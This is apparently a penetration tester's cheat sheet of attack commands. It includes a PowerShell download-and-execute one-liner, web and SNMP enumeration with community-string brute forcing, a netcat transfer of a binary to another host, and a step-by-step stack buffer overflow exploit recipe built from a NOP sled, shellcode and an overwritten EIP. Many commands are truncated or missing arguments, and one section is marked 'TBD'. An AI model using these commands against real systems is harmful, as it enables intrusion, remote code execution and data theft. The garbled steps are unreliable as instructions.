PS C:\> IEX(new-object net.webclient).downloadstring('')
# Find interesting URLs
gobuster -e \
-w /usr/share/wordlists/dirb/common.txt \
-t 20 \
-u <target_url>
# Scan for web vulnz
$ nikto -h <url>
<version> = 1 OR 2c
# Install a bunch of MIBs
$ sudo apt-get install snmp-mibs-downloader
Edit snmp.conf to enable/disable MIB translation
$ sudo vim /etc/snmp/snmp.conf
$ onesixtyone -c /usr/share/doc/onesixtyone/dict.txt <ip>
$ snmpwalk -v<version> -c <community> <ip>
$ python <version> <community> <ip>
# Scan SNMP using default nmap scripts
$ nmap -sU \
-sC \
-p 161 \
-n \
-oA nmap-udp-snmp-default \
# Brute force the SNMP community string using nmap
$ nmap -sU \
-sC \
-p 161 \
-n \
--script snmp-brute \
--script-args snmp-brute.communitiesdb=/usr/share/doc/onesixtyone/dict.txt \
-oA nmap-udp-snmp-brute \
# Prepare netcat to capture and redirect the base64 content to a file
eve$ nc -lvnp 1234 > <binary>.b64
# Base64 encode binary and send to eve via netcat
alice$ base64 <binary> | nc <eve_ip> 1234
# Decode the binary
eve$ base64 --decode <binary>.b64 > <binary>
# ???? Checksec a binary
eve$ checksec -f <binary>
# Create a 500-character alphanumeric sequence
$ /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 500
# Debug the binary using gdb
$ gdb <binary>
# Run the exploit
(gdb) r $( )
! The above should throw a seg fault, followed by a hex address. Use
! this as <hex_address> in the pattern_offset.rb command below.
# Use pattern_offset to determine the offset where seg fault happens
$ /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -q <hex_address>
! Output of pattern_offset above reveals buffer size (BUF_SIZE) below
# Use bash HEREDOC to create ALternatively you can copy the
# contents and paste into an editor.
$ cat << EOF >
#!/usr/bin/env python
# Example (potential) usage:
# # Run in subshell and pass output to vulnerable binary
# bob$ <binary> $( )
# The buffer size is from the output of the pattern_offset command above
# Grab shellcode from some place like packet storm and place it here
SHELL_CODE = "<shell_code>"
# Subtract the length of the shell code from the buffer/offset size,
# generate that many "A" characters (\x90 in hex), and capture them as
# a string in the NOP_SLED var
# EIP is determined using the the section titled "Determine probable EIP
# value" and looks like "0xdeadbeef". This needs to be converted to machine
# code format which looks like "\xef\xbe\xad\xde"
# For example, to convert the hex 0xdeadbeef to machine code format, start
# by taking the last 2 characters (ef) and prefixing it with "\x" to make
# "\xef". Repeat the process with the previous 2 characters (be) and add
# the result which makes "\xef\xbe". Repeat 2 more times and 0xdeadbeef
# becomes "\xef\xbe\xad\xde".
# Repeate the process above using the <eip_hex_address> found by following
# the section titled "Determine probable EIP value" and place the result
# in the EIP var:
EIP = "<eip_address>"
# Finally, print the payload to the screen
# Run the exploit script
(gdb) r $( )
# Print $esp in 100-byte chunks
(gdb) x/100x $esp
# Print 500 bytes before $esp in 100-byte chunks
(gdb) x/100x $esp-500
# Hit <enter> if/until you see multiple lines in a row that look like:
# 0xbffff410: 0x90909090 0x90909090 0x90909090 0x90909090
!! TBD
## How to generate a sha512 hash suitable for /etc/shadow using Mac OSX
$ pip install passlib
$ python -c "from passlib.hash import sha512_crypt; import getpass,string,random; print sha512_crypt.using(salt=''.join([random.choice(string.ascii_letters + string.digits) for _ in range(16)]),rounds=5000).hash(getpass.getpass())"
$ strace <binary>
$ r2 <binary>
# Start by analyzing all functions
[0x12345678]> aaa
# List all functions
[0x12345678]> afl
# Visualize the functions and flow
[0x12345678]> vvv
# Press down to scroll to entrypoint, like main or sym.main
# Press "g" twice to go into entrypoint and prepare ASCII visualization